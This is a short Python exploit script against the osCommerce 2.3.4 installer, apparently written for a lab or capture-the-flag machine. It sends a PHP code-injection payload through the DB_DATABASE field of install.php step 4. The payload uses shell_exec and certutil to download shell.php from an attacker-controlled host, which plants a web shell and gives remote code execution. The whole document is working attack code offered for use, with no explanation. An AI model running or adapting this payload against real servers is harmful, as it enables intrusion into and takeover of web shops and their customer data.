import requests
base_url = "http://10.10.153.225:8080/oscommerce-2.3.4/catalog/" target_url = "http://10.10.153.225:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"
data = { 'DIR_FS_DOCUMENT_ROOT': './' }
payload = '\');' payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.17.6.173:9000/shell.php shell.php");' payload += 'echo $var;' payload += '/*'
data['DB_DATABASE'] = payload
r = requests.post(url=target_url, data=data)
if r.status_code == 200: print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php") else: print("[-] Exploit did not execute as planned")
|